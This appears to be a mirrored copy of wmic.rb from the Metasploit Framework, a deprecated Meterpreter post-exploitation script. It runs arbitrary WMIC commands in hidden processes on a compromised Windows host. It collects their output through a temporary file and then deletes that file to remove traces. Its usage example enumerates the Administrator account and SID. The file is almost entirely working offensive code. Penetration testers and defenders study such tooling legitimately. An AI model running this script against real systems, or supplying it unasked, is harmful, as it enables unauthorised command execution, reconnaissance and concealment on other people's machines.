Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

wmic.rb 3.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
  7. # and Windows XP and Windows 2008 targets.
  8. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
  9. ################## Variable Declarations ##################
  10. session = client
  11. wininfo = client.sys.config.sysinfo
  12. # Setting Arguments
  13. @@exec_opts = Rex::Parser::Arguments.new(
  14. "-h" => [ false,"Help menu." ],
  15. "-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
  16. "-f" => [ true,"File where to saved output of command."],
  17. "-s" => [ true,"Text file with list of commands, one per line."]
  18. )
  19. #Setting Argument variables
  20. commands = []
  21. script = []
  22. outfile = nil
  23. ################## Function Declarations ##################
  24. # Function for running a list of WMIC commands stored in a array, returs string
  25. def wmicexec(session,wmiccmds= nil)
  26. tmpout = ''
  27. session.response_timeout=120
  28. begin
  29. tmp = session.sys.config.getenv('TEMP')
  30. wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
  31. wmiccmds.each do |wmi|
  32. print_status "running command wmic #{wmi}"
  33. print_line wmicfl
  34. r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
  35. sleep(2)
  36. #Making sure that wmic finishes before executing next wmic command
  37. prog2check = "wmic.exe"
  38. found = 0
  39. while found == 0
  40. session.sys.process.get_processes().each do |x|
  41. found =1
  42. if prog2check == (x['name'].downcase)
  43. sleep(0.5)
  44. found = 0
  45. end
  46. end
  47. end
  48. r.close
  49. end
  50. # Read the output file of the wmic commands
  51. wmioutfile = session.fs.file.new(wmicfl, "rb")
  52. until wmioutfile.eof?
  53. tmpout << wmioutfile.read
  54. end
  55. wmioutfile.close
  56. rescue ::Exception => e
  57. print_status("Error running WMIC commands: #{e.class} #{e}")
  58. end
  59. # We delete the file with the wmic command output.
  60. c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
  61. c.close
  62. tmpout
  63. end
  64. # Function for writing results of other functions to a file
  65. def filewrt(file2wrt, data2wrt)
  66. output = ::File.open(file2wrt, "a")
  67. data2wrt.each_line do |d|
  68. output.puts(d)
  69. end
  70. output.close
  71. end
  72. #check for proper Meterpreter Platform
  73. def unsupported
  74. print_error("This version of Meterpreter is not supported with this Script!")
  75. raise Rex::Script::Completed
  76. end
  77. def usage
  78. print_line("Windows WMIC Command Execution Meterpreter Script ")
  79. print_line @@exec_opts.usage
  80. print_line("USAGE:")
  81. print_line("run wmic -c \"WMIC Command Argument\"\n")
  82. print_line("NOTE:")
  83. print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
  84. print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
  85. print_line("Example:")
  86. print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
  87. raise Rex::Script::Completed
  88. end
  89. ################## Main ##################
  90. @@exec_opts.parse(args) { |opt, idx, val|
  91. case opt
  92. when "-c"
  93. commands.concat(val.split("/"))
  94. when "-s"
  95. script = val
  96. if not ::File.exist?(script)
  97. raise "Command List File does not exists!"
  98. else
  99. ::File.open(script, "r").each_line do |line|
  100. next if line.strip.length < 1
  101. next if line[0,1] == "#"
  102. commands << line.chomp
  103. end
  104. end
  105. when "-f"
  106. outfile = val
  107. when "-h"
  108. usage
  109. else
  110. print_error "Unknown option: #{opt}"
  111. usage
  112. end
  113. }
  114. if args.length == 0
  115. usage
  116. end
  117. unsupported if client.platform != 'windows'
  118. if outfile == nil
  119. print_status wmicexec(session,commands)
  120. else
  121. print_status("Saving output of WMIC to #{outfile}")
  122. filewrt(outfile, wmicexec(session,commands))
  123. end